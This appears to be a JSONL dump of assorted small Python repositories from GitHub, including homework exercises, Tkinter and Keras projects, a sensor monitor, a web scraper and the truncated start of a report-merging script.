+{"seq_id":"70006134822","text":"import serial_hex\nfrom PyQt5 import (QtCore, QtGui, QtWidgets)\nfrom ui_letter import Ui_LetterWidget\n\n\nclass LetterWidget(QtWidgets.QWidget, Ui_LetterWidget):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n def setLetter(self, letter):\n \"\"\"\n Returns a letter to the PyQt5 screen.\n \"\"\"\n\n self.letter.setText(letter.upper())\n data = serial_hex.charToBraille(letter).replace('0', '.').replace('1', 'O')\n data = data[0] + data[3] + '\\n' + data[1] + data[4] + '\\n' + data[2] + data[5]\n self.braille.setText(data)\n","repo_name":"braille-systems/braille-trainer","sub_path":"python/letter.py","file_name":"letter.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"15726926974","text":"a = \"y\"\r\nb = \"\"\r\nwhile (a == \"y\"):\r\n def binary_tree(x):\r\n return [x, [], []]\r\n def insert_left (root, new_branch):\r\n t = root.pop (1)\r\n if len(t)> 1:\r\n root.insert(1, [new_branch, t, []])\r\n else:\r\n root.insert(1, [new_branch, [], []])\r\n return root\r\n def insert_right(root, new_branch):\r\n t=root.pop(2)\r\n if len(t) > 1:\r\n root.insert (2, [new_branch, [], t])\r\n else:\r\n root.insert(2, [new_branch, [], []])\r\n return root\r\n def get_root_val(root):\r\n return root [0]\r\n def get_root_val(root, new_val):\r\n root[0] = new_val\r\n def get_left_child(root):\r\n return root [1]\r\n def get_right_child(root):\r\n return root[2]\r\n b = str (input(\"cuaca :\"))\r\n x = binary_tree(b)\r\n insert_left(x, str(input(\"cabang :\")))\r\n insert_left(x, str(input(\"pohon :\")))\r\n insert_right(x, str(input(\"ranting kanan :\")))\r\n insert_right(x, str(input(\"ranting kiri :\")))\r\n l = get_left_child(x)\r\n\r\n print(x)\r\n if (b == \" cerah\") or(b == \"lembab\"):\r\n print(\"hasil : bisa main\")\r\n elif (b == \"hujan\") or (b == \"angin\"):\r\n print(\"hasil : tidak main\")\r\n a = input (\" mau ulang \")\r\n","repo_name":"RiskaIndahCahyanti/struktur_data","sub_path":"tugas phyton riska.py","file_name":"tugas phyton riska.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34014795130","text":"from tkinter import *\nfrom tkinter.messagebox import showwarning, showinfo, askyesno\nfrom delete_database_queries import delete_worker\nfrom file_processing_module import save_file\n\nresult_key=None # результирующий ключ\ndialog_box_state = False # состояние окна диалога\n\n\ndef clicked_choice(window, key):\n global result_key, dialog_box_state\n result_key=key\n dialog_box_state=False\n window.destroy()\n\n\ndef dialog_window(dict_keys):\n global result_key, dialog_box_state\n dialog_box_state=True\n dialogue = Tk()\n dialogue.title('Внимание')\n dialogue.geometry('400x200')\n inscription_1 = Label(dialogue, text=\"В результате поиска в системе \\nпо этим данным было обнаружено несколько работников\")\n inscription_1.pack(anchor='c')\n inscription_2 = Label(dialogue, text=\"Найденные данне по какому полю вывести?\")\n inscription_2.pack(anchor='c')\n \n for key in dict_keys:\n add_tab_btn = Button(dialogue, text=key, command=lambda: clicked_choice(dialogue, key)) \n add_tab_btn.pack(anchor='c')\n while True:\n if dialog_box_state==False:\n return result_key\n\n\ndef selection_data_display(data_dict):\n global dialog_box_state\n result_data_dict={}\n for key in data_dict:\n if data_dict[key]!=None:\n result_data_dict[key] = data_dict[key]\n if len(result_data_dict)>1:\n result_key = dialog_window(list(data_dict.keys()))\n result_data_dict = result_data_dict[result_key]\n elif len(result_data_dict)==0:\n return -1\n return list(result_data_dict.values())[0]\n\n\ndef creating_output_list(data_dict):\n output_list = [\"Личные данные работника\",\n f\"Имя: {data_dict['worker'][0][1]}\", f\"Фамилия: {data_dict['worker'][0][2]}\", f\"Отчество: {data_dict['worker'][0][3]}\", \n f\"Дата рождения: {data_dict['worker'][0][5]}\", f\"Семейное положение: {data_dict['family_status'][0][0]}\", \n f\"Количество детей: {data_dict['worker'][0][6]}\", \n \"Контакты\",\n f\"Почта: {data_dict['worker'][0][4]}\", f\"Номер телефона: {data_dict['phone'][0][0]}\", \n f\"Статус номера: {data_dict['phone'][0][1]}\", \n \"Рабочие данные\",\n f\"Должность: {data_dict['post'][0][0]}\", f\"Опыт работы: {data_dict['worker'][0][-2]}\", \n f\"Дата устройства: {data_dict['worker'][0][-4]}\", f\"Дата увольнения: {data_dict['worker'][0][-3]}\", \n f\"Тип трудоустройства: {data_dict['type_contract'][0][0]}\", f\"Зарплата: {data_dict['worker'][0][-1]}\", \n \"Адрес\", \n f\"Город: {data_dict['address'][0][0]}\", f\"Улица: {data_dict['address'][0][1]}\", \n f\"Номер улицы: {data_dict['address'][0][2]}\", f\"Этаж: {data_dict['address'][0][3]}\", \n f\"Номер квартиры: {data_dict['address'][0][4]}\", f\"Статус жилья: {data_dict['address'][0][-1]}\", \n \"Доккументы работника\", \n f\"Номер паспорта: {data_dict['documents'][0][0]}\", f\"Серия паспорта: {data_dict['documents'][0][1]}\", \n f\"Кем выдан: {data_dict['documents'][0][3]}\", f\"Номер снилс: {data_dict['documents'][0][2]}\"]\n \n return output_list\n\n\ndef clicked_clear(listbox, clear_btn, del_btn, save_btn):\n listbox.destroy()\n clear_btn.destroy()\n del_btn.destroy()\n save_btn.destroy()\n\n\ndef clicked_deletion(listbox, clear_btn, del_btn, save_btn, data_dict):\n result = askyesno(title=\"Подтвержение операции\", message=\"Вы действиетльно хотите удалить эти данные?\")\n if result: \n delete_worker(data_dict['worker'][0][0])\n showinfo(\"Результат\", \"Данные удалены\")\n clicked_clear(listbox, clear_btn, del_btn, save_btn)\n else: \n showinfo(\"Результат\", \"Операция отменена\")\n \n\ndef clicked_save(save_data):\n save_file(save_data)\n showinfo(\"Результат\", \"Успешно сохранено\")\n\n\ndef showing_data(one_tab, data_dict):\n data_dict=selection_data_display(data_dict)\n if data_dict!=-1:\n output_data = creating_output_list(data_dict)\n \n languages_var = StringVar(value=output_data)\n listbox = Listbox(one_tab, listvariable=languages_var, width=80, height=14)\n listbox.grid(column=0, row=5, columnspan=4)\n listbox.yview_scroll(number=1, what=\"units\")\n\n clear_btn = Button(one_tab, text=\"Очистить\", command=lambda: clicked_clear(listbox, clear_btn, save_btn, deletion_btn)) \n clear_btn.grid(column=6, row=6, padx=1, pady=1)\n\n save_btn = Button(one_tab, text=\"Сохранить данные в файл\", command=lambda: clicked_save(output_data)) \n save_btn.grid(column=6, row=7, padx=1, pady=1)\n \n deletion_btn = Button(one_tab, text=\"Удалить данные\", command=lambda: clicked_deletion(listbox, clear_btn, save_btn, deletion_btn, data_dict)) \n deletion_btn.grid(column=6, row=8, padx=1, pady=1)\n else:\n showwarning(title=\"Внимание\", message=\"Такого работника нет\")\n\n\n","repo_name":"Furiwarius/Homework_python_8","sub_path":"output_entered_data.py","file_name":"output_entered_data.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15525529479","text":"f = open('27985_B (1).txt')\nn = int(f.readline())\nd = [int(x) for x in f]\npr_max = 0\nfor i in range(n-1):\n for j in range(i+2, n):\n if (d[i] * d[j]) % 14 == 0:\n pr_max = max(pr_max, d[i] * d[j])\n \nprint(pr_max)\n","repo_name":"anyashishkina/python_tasks","sub_path":"ege/tests/apr_v14/27A_B.py","file_name":"27A_B.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"111041280","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 12 16:33:42 2021\n\n@author: johnh\n\"\"\"\nimport datetime\n\ntotal = int()\ndonations=[]\naddress = {'number': int(), 'street': str(), 'city': str(), 'state': str(), 'zipcodefive': int()}\nname = 'Example Donor'\nfirst = 'Example'\nlast = 'Donor'\nphone_number = str()\ndate = [int(), int(), int()]\nstatus = bool()\n\nx = datetime.datetime.now()\nxyear = x.year \nxday = x.day\nxmonth = x.month\n\nprint(type(xyear))\nprint(type(xday))\nprint(type(xmonth))\n\n#key is name, value is a list of data structures, 0 is donations, 1 is total, \n# 2 is list of fist and last names, 3 is address, 4 phone number,\n# 5 is last donation date, 6 is status\nstandard_data_dict_template = {'name':[donations, total, [first, last], None, None, None, None]}\nfull_data_dict_template = {'name':[donations, total, [first, last], address, phone_number, date, status]}","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/john_hunter/lesson09/mailroom_data_structure.py","file_name":"mailroom_data_structure.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"18170038859","text":"import time\r\nfrom sklearn import svm, preprocessing\r\nimport random\r\nimport numpy as np\r\nimport os\r\nfrom sklearn.externals import joblib\r\nimport sys\r\n\r\n\r\ndef view_bar(num, mes):\r\n rate_num = num\r\n number = int(rate_num / 4)\r\n hashes = '=' * number\r\n spaces = ' ' * (25 - number)\r\n r = \"\\r\\033[31;0m%s\\033[0m:[%s%s]\\033[32;0m%d%%\\033[0m\" % (mes, hashes, spaces, rate_num,)\r\n sys.stdout.write(r)\r\n sys.stdout.flush()\r\n\r\n\r\nlbp_file = open('result_output.txt', 'r')\r\nlbp_features = lbp_file.readlines()\r\nlbp_file.close()\r\nlbp_list = []\r\na = 0\r\nfor line in lbp_features:\r\n line = line.strip()\r\n line = eval(line)\r\n lbp_list.append(line)\r\n a += 1\r\n view_bar(a / 3884 * 100, 'LBP Processing')\r\nprint(\"\\nLbp has been loaded!\")\r\n\r\nlabel_file = open('real_labels.txt', 'r')\r\nlabels = label_file.readlines()\r\nlabel_file.close()\r\nlabel_list = []\r\nfor label in labels:\r\n label = label.strip()\r\n label_list.append(int(label))\r\nprint(\"Label has been loaded!\")\r\n\r\nxs = list(range(3880))\r\nrng = random.Random()\r\nrng.shuffle(xs)\r\nfold = [xs[388 * i:388 * (i + 1)] for i in range(10)]\r\nscores = []\r\nfor i in range(10):\r\n start = time.clock()\r\n print('Group' + str(i))\r\n path = fold[i]\r\n opath = [k for k in xs if k not in path]\r\n\r\n training = [lbp_list[i] for i in opath]\r\n training = np.array(training)\r\n label = [label_list[i] for i in opath]\r\n label = np.array(label)\r\n # scaler = preprocessing.StandardScaler()\r\n # training = scaler.fit_transform(training)\r\n\r\n # parameters = {\"kernel\": (\"linear\", \"rbf\"), \"C\": list(range(1, 100))}\r\n # svr = svm.SVC()\r\n # clf = grid_search.GridSearchCV(svr, parameters)\r\n # clf.fit(training, label)\r\n # print(clf.best_params_)\r\n clf = svm.SVC(kernel='poly', C=4000)\r\n clf.fit(training, label)\r\n print(\"Fit successfully!\")\r\n\r\n result = []\r\n for t in path:\r\n test = [lbp_list[t]]\r\n result.append(clf.predict(test))\r\n\r\n tp = 0\r\n fp = 0\r\n fn = 0\r\n for k in range(len(result)):\r\n if result[k] == [1] and path[k] <= 2132:\r\n tp += 1\r\n if result[k] == [1] and path[k] > 2132:\r\n fp += 1\r\n if result[k] == [0] and path[k] <= 2132:\r\n fn += 1\r\n f1 = 2 * tp / (2 * tp + fp + fn)\r\n print(f1)\r\n scores.append(f1)\r\n print(time.clock() - start)\r\n name = \"train_model\" + str(i) + \".m\"\r\n joblib.dump(clf, name)\r\n\r\nbest_score = max(scores)\r\ntotal = 0\r\nfor score in scores:\r\n total += score\r\nave_score = total / 10\r\nprint(\"The average F1 score is \" + str(ave_score))\r\nprint(\"The highest F1 score is \" + str(best_score))\r\ni = scores.index(best_score)\r\nprint(\"The best model is model\" + str(i))\r\nisexist = os.path.exists('train_model.m')\r\nif isexist:\r\n os.remove('train_model.m')\r\nfor k in range(10):\r\n if k != i:\r\n os.remove(\"train_model\" + str(k) + \".m\")\r\n else:\r\n os.rename(\"train_model\" + str(k) + \".m\", 'train_model.m')\r\n\r\n","repo_name":"fffffarmer/Smile-Detection","sub_path":"get_F1_score.py","file_name":"get_F1_score.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"29717872637","text":"def nested_list(names_score):\n dic_res = {}\n scores = []\n for data in names_score:\n if data:\n if not data[1] in dic_res:\n dic_res[data[1]] = []\n dic_res[data[1]].append(data[0])\n else:\n dic_res[data[1]].append(data[0])\n scores.append(data[1])\n scores.sort()\n last_score = scores[0]\n for s in scores:\n if last_score != s:\n res_names = dic_res[s]\n break\n res_names.sort()\n return res_names\n \nif __name__ == '__main__':\n names_score = [[]]\n for _ in range(int(input())):\n name = input()\n score = float(input())\n names_score.append(list([name, score]))\n res_list =nested_list(names_score)\n \n for s in res_list:\n print(s)\n \n ","repo_name":"gppprimo/HackerRank_Solutions","sub_path":"Solutions/Nested_list.py","file_name":"Nested_list.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6302232297","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 2 11:43:01 2022\r\n@author: ctesc\r\n\"\"\"\r\n##### VARIABLES A MODIFIER ######\r\nreset = False # Reset reseau neuronnes\r\nnb_hidden = 8 # Nombre neuronnes couche cachee\r\nepochs = 100 # Nombre de batch d entrainement des poids\r\n\r\nimport warnings\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport tensorflow as tf\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense\r\nfrom keras.utils import np_utils\r\nfrom sklearn.preprocessing import StandardScaler, LabelEncoder\r\nwarnings.filterwarnings('ignore')\r\nfull_path='C:/Users/ctesc/OneDrive/Desktop/ml_alexis'\r\nos.chdir('C:/Users/ctesc/OneDrive/Desktop/ml_alexis') #Chemin vers repertoire travail\r\n#os.chdir('C:/Users/AlexisCS/Documents/IA/Projet_CTACRIA') #Chemin vers repertoire travail\r\n#pd.set_option('display.max_row', 100)\r\npd.set_option('display.max_column', 200) #allow to display 200 columns of the dataset: useful to see all features\r\n\r\n#------------------------------------------------------------------------------\r\n# Lecture donnees entree\r\n\r\ndata=pd.read_csv('DN_Full_Voxels_Spectres.csv', sep = ';', decimal=',')\r\nsource = data['Source (MeV)']\r\nvoxels = data['Fantome']\r\n\r\n#------------------------------------------------------------------------------\r\n# Mise en forme des donnees\r\n\r\nencoder = LabelEncoder()\r\nsource_tr = encoder.fit_transform(source)\r\nvoxels_tr = encoder.fit_transform(voxels)\r\nsource_tr = source_tr.reshape((len(source_tr), 1))\r\nvoxels_tr = voxels_tr.reshape((len(source_tr), 1))\r\n\r\nX = np.concatenate((\r\n #source_tr, \r\n voxels_tr, \r\n np.array(data['Pastille 1']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 2']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 3']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 4']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 5']).reshape((len(source_tr), 1)), \r\n np.array(data['Pastille 6']).reshape((len(source_tr), 1)),\r\n np.array(data['Moyenne reelle (barns)']).reshape((len(source_tr), 1)),\r\n np.array(data['Ecart type reel']).reshape((len(source_tr), 1))), axis=1)\r\n\r\ny = np.array(data['Angle (degres)'])\r\nscaler = StandardScaler()\r\nX = scaler.fit_transform(X)\r\n\r\nfor i in range(0, len(y)): # Decoupage des valeurs de sorties\r\n if y[i]==360:\r\n y[i] = 0\r\n y[i] = y[i]/15\r\n \r\ndummy_y = np_utils.to_categorical(y)\r\nX_train, X_test, y_train, y_test = train_test_split(X, dummy_y, test_size=.2)\r\n\r\n#------------------------------------------------------------------------------\r\n# Fonction model baseline\r\n\r\ndef baseline_model(nb_hidden=nb_hidden):\r\n model=Sequential()\r\n model.add(Dense(nb_hidden, input_shape=(X.shape[1],), activation = 'relu'))\r\n #model.add(Dense(8, activation = 'relu'))\r\n model.add(Dense(24, activation = 'softmax'))\r\n \r\n myOpt = tf.keras.optimizers.Adam(learning_rate=0.0005, name='Adam')\r\n model.compile(loss='categorical_crossentropy', optimizer = myOpt, \r\n metrics = ['accuracy'])\r\n # global train_loss\r\n # global val_loss\r\n # global train_acc\r\n # global val_acc\r\n # train_loss = []\r\n # val_loss = []\r\n # train_acc = []\r\n # val_acc = []\r\n \r\n return model\r\n\r\n#------------------------------------------------------------------------------\r\n# Entrainement resultats\r\n\r\ndef train(reset, epochs=epochs, nb_hidden=nb_hidden):\r\n filename = f'model_{nb_hidden}/model_{nb_hidden}_save'\r\n if reset:\r\n model = baseline_model(nb_hidden)\r\n else:\r\n model = load_model(filename)\r\n \r\n \r\n memory = model.fit(X_train, y_train, epochs=epochs, batch_size=64, \r\n validation_data=(X_test, y_test), shuffle=True, verbose=1)\r\n model.save(filename)\r\n if reset:\r\n hist = pd.DataFrame(memory.history)\r\n with open(filename+'_history.csv', mode='w') as f:\r\n hist.to_csv(f)\r\n else :\r\n hist = pd.DataFrame(memory.history)\r\n with open(filename+'_history.csv', mode='a') as f:\r\n hist.to_csv(f, header=False)\r\n return memory.history\r\n\r\n#------------------------------------------------------------------------------\r\n# Analyse des resultats\r\n\r\ndef update_metrics(reset, epochs=100):\r\n# =============================================================================\r\n# global train_loss\r\n# global val_loss\r\n# global train_acc\r\n# global val_acc\r\n# global memory\r\n# =============================================================================\r\n filename = f'model_{nb_hidden}/model_{nb_hidden}_save'\r\n memory = train(epochs=epochs, reset = reset)\r\n #print(np.array(memory.history['loss']))\r\n # train_loss = [float(i) for i in train_loss]\r\n # val_loss = [float(i) for i in val_loss]\r\n # train_acc = [float(i) for i in train_acc]\r\n # val_acc = [float(i) for i in val_acc]\r\n # train_loss.append(history.history['loss'])\r\n # val_loss.append(history.history['val_loss'])\r\n # train_acc.append(history.history['accuracy'])\r\n # val_acc.append(history.history['val_accuracy']) \r\n if reset:\r\n train_loss = memory['loss']\r\n val_loss = memory['val_loss']\r\n train_acc = memory['accuracy']\r\n val_acc = memory['val_accuracy']\r\n else:\r\n hist = pd.read_csv(filename+'_history.csv')\r\n train_loss = hist.loss\r\n val_loss = hist.val_loss\r\n train_acc = hist.accuracy\r\n val_acc = hist.val_accuracy\r\n# =============================================================================\r\n# new_train_loss = np.array(memory['loss'])\r\n# new_train_loss = new_train_loss.reshape((new_train_loss.shape[0], 1))\r\n# old_train_loss = np.array(hist.loss)\r\n# old_train_loss = old_train_loss.reshape((old_train_loss.shape[0], 1))\r\n# train_loss = np.concatenate((old_train_loss, \r\n# new_train_loss), axis=0)\r\n# new_val_loss = np.array(memory['val_loss'])\r\n# new_val_loss = new_val_loss.reshape((new_val_loss.shape[0], 1))\r\n# old_val_loss = np.array(hist.val_loss)\r\n# old_val_loss = old_val_loss.reshape((old_val_loss.shape[0], 1))\r\n# val_loss = np.concatenate((old_val_loss, \r\n# new_val_loss), axis=0)\r\n# new_train_acc = np.array(memory['accuracy'])\r\n# new_train_acc = new_train_acc.reshape((new_train_acc.shape[0], 1))\r\n# old_train_acc = np.array(hist.accuracy)\r\n# old_train_acc = old_train_acc.reshape((old_train_acc.shape[0], 1))\r\n# train_acc = np.concatenate((old_train_acc, \r\n# new_train_acc), axis=0)\r\n# new_val_acc = np.array(memory['val_accuracy'])\r\n# new_val_acc = new_val_acc.reshape((new_val_acc.shape[0], 1))\r\n# old_val_acc = np.array(hist.val_accuracy)\r\n# old_val_acc = old_val_acc.reshape((old_val_acc.shape[0], 1))\r\n# val_acc = np.concatenate((old_val_acc, \r\n# new_val_acc), axis=0)\r\n# =============================================================================\r\n\r\n\r\n # train_loss = np.array(train_loss)\r\n # val_loss = np.array(val_loss)\r\n # train_acc = np.array(train_acc)\r\n # val_acc = np.array(val_acc)\r\n # train_loss = train_loss.reshape((train_loss.shape[0], 1))\r\n # val_loss = val_loss.reshape((val_loss.shape[0], 1))\r\n # train_acc = train_acc.reshape((train_acc.shape[0], 1))\r\n # val_acc = val_acc.reshape((val_acc.shape[0], 1))\r\n frame = {'train_loss': train_loss, 'val_loss':val_loss, 'train_acc':train_acc, 'val_acc':val_acc}\r\n metrics = pd.DataFrame(frame)\r\n print(metrics)\r\n \r\n return metrics\r\n\r\n#------------------------------------------------------------------------------\r\n# Trace des graphes\r\n\r\ndef graphs(reset, epochs=100, nb_hidden=nb_hidden):\r\n metrics = update_metrics(reset=reset, epochs=epochs)\r\n plt.figure(figsize=(12,8))\r\n plt.plot(metrics['val_acc'], label='val acc')\r\n plt.plot(metrics['train_acc'], label = 'train acc')\r\n plt.legend()\r\n plt.savefig(f'model_{nb_hidden}/accuracy_{nb_hidden}.png', dpi=200)\r\n \r\n plt.figure(figsize=(12,8))\r\n plt.plot(metrics['val_loss'], label='val loss')\r\n plt.plot(metrics['train_loss'], label = 'train loss')\r\n plt.legend()\r\n plt.savefig(f'model_{nb_hidden}/loss_{nb_hidden}.png', dpi=200)\r\n \r\n return ","repo_name":"FrankLloyd83/CTACSIA","sub_path":"Reseau_V1.4.py","file_name":"Reseau_V1.4.py","file_ext":"py","file_size_in_byte":8607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12467206488","text":"import socket\r\n\r\ndef Main():\r\n host='192.168.0.106'\r\n port=6000\r\n\r\n s=socket.socket()\r\n\r\n data='order food'\r\n print('file ot to send')\r\n s.connect((host,port))\r\n s.send(data.encode('utf-8'))\r\n chatbot_ip=s.recv(1024).decode('utf-8')\r\n print('data recv: ',chatbot_ip)\r\n print(type(chatbot_ip))\r\n s.close()\r\n\r\n host = '192.168.0.109'\r\n port = 5000\r\n\r\n s = socket.socket()\r\n print('socket done')\r\n data = 'order food'\r\n print('file ot to send')\r\n s.connect((host, port))\r\n s.send(data.encode('utf-8'))\r\n result = s.recv(1024).decode('utf-8')\r\n print('data recv: ', result)\r\n s.close()\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n Main()","repo_name":"sharvi1011/Social-networking-for-chatbots","sub_path":"ui2mdel.py","file_name":"ui2mdel.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23751264311","text":"#!/usr/bin/python\n\nimport re\nimport os\n\nvoltage_re = re.compile(r'(\\d+.\\d+) V')\ncurrent_re = re.compile(r'(\\d+.\\d+) (m?A)')\n\n# Reference\n# https://techbase.kde.org/Development/Tutorials/Sensors\n\n# path\n# /home/pedrovdsc/Projects/Power Plotter/power_plotter.py\nif __name__ == '__main__':\n print('ksysguardd 1.2.0')\n while True:\n request = input('ksysguardd> ')\n\n stream = os.popen('sensors')\n output = stream.read()\n\n voltage_str = voltage_re.findall(output)[0]\n current_str, current_sufix = current_re.findall(output)[0]\n\n voltage = float(voltage_str)\n current = float(current_str) * (1 if 'm' in current_sufix else 1000)\n power = voltage * current / 1000\n\n if request == 'monitors':\n print('Voltage\\tfloat')\n print('Current\\tfloat')\n print('Power\\tfloat')\n elif request == 'Voltage':\n print(voltage)\n elif request == 'Voltage?':\n print('voltage\\t10\\t14\\tV')\n elif request == 'Current':\n print(current)\n elif request == 'Current?':\n print('current\\t0\\t3000\\tmA')\n elif request == 'Power':\n print(power)\n elif request == 'Power?':\n print('power\\t0\\t45\\tW')","repo_name":"pedrovdsc/acer-swift","sub_path":"Power Monitor/power_monitor.py","file_name":"power_monitor.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"32396370084","text":"#!python3\nimport os\nimport sys\n\n\ndef stop():\n cmd = 'ps ax | grep \"cc_clipboard_script.py\"'\n print(\"$\", cmd)\n o = os.popen(cmd).read()\n print(o)\n cmd = f\"kill {o.split(' ')[0]}\"\n print(\"$\", cmd)\n print(os.popen(cmd).read())\n\n\ndef start():\n stop()\n cmd = 'nohup python3 cc_clipboard_script.py > cc.log &'\n print(\"$\", cmd)\n print(os.popen(cmd).read())\n\n\ndef main():\n print()\n args = sys.argv[1]\n if args == \"start\":\n\n start()\n elif args == \"stop\":\n stop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sssr-dev/cc-clipboard","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"2769180833","text":"from bs4 import BeautifulSoup\nfrom urllib2 import urlopen\nimport csv\nimport time\n\n# function to parse web page\ndef make_soup(url):\n\thtml = urlopen(url).read()\n\treturn BeautifulSoup(html,\"lxml\")\n\nif __name__ == '__main__':\n\n\tlinks = []\n\n\t# gets all links to missing person profiles\n\tfor i in range(1,21,1):\n\t\turl_to_scrape = \"http://missingpersons.police.uk/en/search/\" + str(i)\n\t\tsoup = make_soup(url_to_scrape)\n\t\tbodies = soup.findAll(\"li\", \"Highlight\")\n\t\tfor body in bodies:\n\t\t\tlinks.append(\"http://missingpersons.police.uk\" + body.a[\"href\"])\n\t\ttime.sleep(1)\n\n\t# gets details from each link and writes to csv\n\twith open(\"bodies.csv\", 'w') as outfile:\n\t\tnew_file = csv.writer(outfile)\n\t\tnew_file.writerow([\"id\", \"status\", \"source\", \"gender\", \"age\", \"ethnicity\", \"height\", \"build\", \"date\", \"circumstances\"])\n\t\t\n\t\tid_no = 0\n\n\t\tfor link in links: \n\t\t\tid_no += 1\n\t\t\t\n\t\t\ttry:\n\t\t\t\tsoup = make_soup(link)\n\t\t\t\ttime.sleep(1)\n\t\t\t\tcells = soup.findAll(\"td\")\n\t\t\t\tgender = cells[1].string\n\t\t\t\tage = cells[3].string\n\t\t\t\tethnicity = cells[5].string\n\t\t\t\theight = cells[7].string\n\t\t\t\tbuild = cells[9].string\n\t\t\t\tdate = cells[11].string\n\t\t\t\tcircumstances = soup.find('p').string\n\t\t\t\tnew_file.writerow([id_no, \"ok\", link, gender, age, ethnicity, height, build, date, circumstances])\n\t\t\t\t\n\t\t\texcept:\n\t\t\t\tnew_file.writerow([id_no, \"failed\", link])\n\n\t\t\n\tif not outfile.closed:\n\t\toutfile.close()\n","repo_name":"patrickescott/unidentified-bodies-python-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21493063141","text":"import math\n\nwith open('2022/puzzle_inputs/25.txt') as file:\n strInput = file.read()\n\ntest_strInput = \"\"\"1=-0-2\n12111\n2=0=\n21\n2=01\n111\n20012\n112\n1=-1=\n1-12\n12\n1=\n122\"\"\"\n\n# split list\n# convert each base 5 number to decimal\n## decode each position and multiply by the corresponding value\n# sum the numbers \n# then convert back to base 5\n\n\ndef decode(b5_str):\n \"\"\"\n Convert string representation of base 5 to decimal integer\n \"\"\"\n decoder = {'2':2,'1':1,'0':0,'-':-1,'=':-2}\n decimal = 0\n for i, component in enumerate(b5_str[::-1]):\n decimal += ((5**i)*decoder[component])\n return decimal\n\ndef encode(decimal):\n # need to factor the number\n # encoder = \n result = decimal\n b5_str = \"\"\n while result != 0:\n quotient = result / 5\n remainder = round(5*(quotient - math.floor(quotient)),1)\n # now I need to account for having -2 to 2 not 0-5\n b5_str += str(int(remainder))\n result = int(quotient)\n\n # so a 3 in one position gets turned into\n b5_str_aug = [x for x in b5_str]\n for i in range(len(b5_str_aug)):\n value = b5_str_aug[i]\n if int(value) == 3:\n b5_str_aug[i] = \"=\"\n try:\n b5_str_aug[i+1] = str(int(b5_str_aug[i+1]) + 1)\n except:\n b5_str_aug.append(\"1\")\n elif int(value) == 4:\n b5_str_aug[i] = \"-\"\n try:\n b5_str_aug[i+1] = str(int(b5_str_aug[i+1]) + 1)\n except:\n b5_str_aug.append(\"1\")\n else:\n continue\n return ''.join(b5_str_aug)[::-1]\n\ndef main(input):\n b5_list = [x for x in input.split('\\n') if x != '']\n decimals = []\n for b5_str in b5_list:\n decimals.append(decode(b5_str))\n \n sum_decimals = sum(decimals)\n return encode(sum_decimals)\n\n\n\nif __name__ == '__main__':\n print(main(strInput))\n","repo_name":"cgbledsoe/advent_of_code","sub_path":"2022/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41887249606","text":"\"\"\"Merge all available pipeline reports into a single HTML file.\"\"\"\n####\n#### Merge all available pipeline reports into a single HTML file.\n####\n#### Example usage to analyze \"whatever\":\n#### python3 merge-all-reports.py --help\n#### mkdir -p /tmp/mnt || true\n#### mkdir -p /tmp/foo || true\n#### sshfs -oStrictHostKeyChecking=no -o IdentitiesOnly=true -o IdentityFile=/home/sjcarbon/local/share/secrets/bbop/ssh-keys/foo.skyhook -o idmap=user skyhook@skyhook.berkeleybop.org:/home/skyhook /tmp/mnt/\n#### cp /tmp/mnt/master/reports/whatever* /tmp/foo\n#### fusermount -u /tmp/mnt\n#### python3 merge-all-reports.py -v -d /tmp/foo\n####\n\nimport sys\nimport argparse\nimport logging\nimport glob\nimport os\nimport subprocess\nimport markdown\n\n## Logger basic setup.\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger('merge')\nLOGGER.setLevel(logging.WARNING)\n\n## Make sure we exit in a way that will get Jenkins's attention.\nDIED_SCREAMING_P = False\n\ndef die_screaming(string):\n \"\"\" Die and take our toys home. \"\"\"\n global DIED_SCREAMING_P\n LOGGER.error(string)\n DIED_SCREAMING_P = True\n #sys.exit(1)\n\ndef main():\n\n ## Deal with incoming.\n parser = argparse.ArgumentParser(\n 